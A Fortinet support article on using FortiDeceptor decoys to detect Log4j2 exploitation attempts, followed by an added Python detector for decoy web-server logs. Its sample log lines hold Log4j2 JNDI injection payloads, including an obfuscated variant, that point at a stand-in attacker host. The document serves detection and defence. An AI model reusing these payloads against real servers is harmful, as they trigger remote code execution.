FortiDeceptor
FortiDeceptor provides Deception-based Breach Protection to deceive, expose and eliminate external and internal threats.
mbensimon
Staff
Article Id 201741
Description

This article describes how FortiDeceptor decoys can detect activity related to the Log4j2 remote code execution vulnerability (CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105).

A zero-day exploit was discovered in Log4j2, a popular Java library, that can result in remote code execution (RCE).

Log4j2 is a Java-based logging utility that is part of the Apache Software

Cyber deception against attacks that try to leverage the Log4j2 vulnerability:

 

1) FortiDeceptor starts by deploying network decoys across the network segments, creating a fake environment that simulates the real network and its assets.

The 'Log4j2' exploit targets web applications, so network decoys such as Ubuntu and CentOS with a web server enabled are deployed across several network locations such as the data center, DMZ and cloud.

2) In addition, the FortiDeceptor customization module can generate a decoy template from the customer's gold image and deploy it across the network and in the customer data center. A decoy that runs the customer's gold image and is part of the customer's domain network expands the attack surface presented to any malware or threat actor trying to leverage the 'Log4j2' vulnerability.

In addition, this decoy generates accurate threat intelligence and IOCs about the attack.

Scope

The deception decoys and lures against 'Log4j2' vulnerability attacks can be used in FortiDeceptor v3.3 and above.

Solution

Cyber deception against 'Log4j2' attacks:

1) Configure the network segments under the 'Deployment Network' section that FortiDeceptor will use to deploy network decoys (due to the nature of the attack, verify that the data center, DMZ and cloud segments where web servers are located are covered).

2) Use the 'Customization' feature to deploy a Windows 2016/2019 decoy that runs Windows IIS Server (see this video for technical instructions on how to use the customization module: https://video.fortinet.com/products/fortideceptor/3.0/fortideceptor-windows-customization ).

3) Deploy network decoys (Linux with a web server enabled) across the data center, DMZ and cloud VLAN segments that are configured under the 'Deployment Network' section.

4) Once a threat actor or malware tries to penetrate a decoy that runs a web server, FortiDeceptor triggers a real-time alert.

5) FortiDeceptor leverages the Fortinet Fabric to execute a threat mitigation response that isolates the threat.
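As an added example (not part of this article and not FortiDeceptor code), the kind of check a decoy web server's access log can be run through to surface the Log4j2 lookup probes that step 4 alerts on, including URL-encoded and nested-lookup variants; the log lines and the host name attacker.example are constructed.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines as a web-server decoy might record them (not real data).
SAMPLE_LOG = """\
10.0.5.23 - - [11/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
10.0.5.23 - - [11/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://attacker.example/a}"
10.0.5.23 - - [11/Dec/2021:03:14:11 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Armi%3A//attacker.example/b%7D HTTP/1.1" 404 0 "-" "curl/7.68"
10.0.9.1 - - [11/Dec/2021:03:15:00 +0000] "GET /health HTTP/1.1" 200 2 "-" "kube-probe/1.21"
"""

# Nested lookups such as ${lower:j} or ${::-j} resolve to a single character; the
# pattern requires ':' (optionally ':-') right before that character and the closing
# brace, so a plain ${jndi:ldap://host/path} is left untouched.
_NESTED = re.compile(r"\$\{[^{}]*?:-?([A-Za-z])\}")
# The lookup that Log4j2 versions affected by CVE-2021-44228 would try to resolve.
_JNDI = re.compile(r"\$\{\s*jndi\s*:[^}]*\}?", re.IGNORECASE)


def normalize(text: str) -> str:
    """URL-decode (a few rounds) and collapse nested lookups so obfuscated
    forms such as ${${lower:j}ndi:...} read as ${jndi:...}."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    prev = None
    while prev != text:
        prev = text
        text = _NESTED.sub(r"\1", text)
    return text


def find_log4j_probes(log_text: str) -> list:
    """One finding per log line whose normalized form carries a JNDI lookup:
    the requesting client address plus the lookup string as evidence."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        match = _JNDI.search(normalize(line))
        if match:
            findings.append({"client": line.split(" ", 1)[0], "lookup": match.group(0)})
    return findings


if __name__ == "__main__":
    for hit in find_log4j_probes(SAMPLE_LOG):
        print(f"alert: {hit['client']} sent {hit['lookup']}")
```

Because the decoy serves no real application, any such lookup in its log is a high-confidence signal that can feed the alert and IOC data the article describes.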
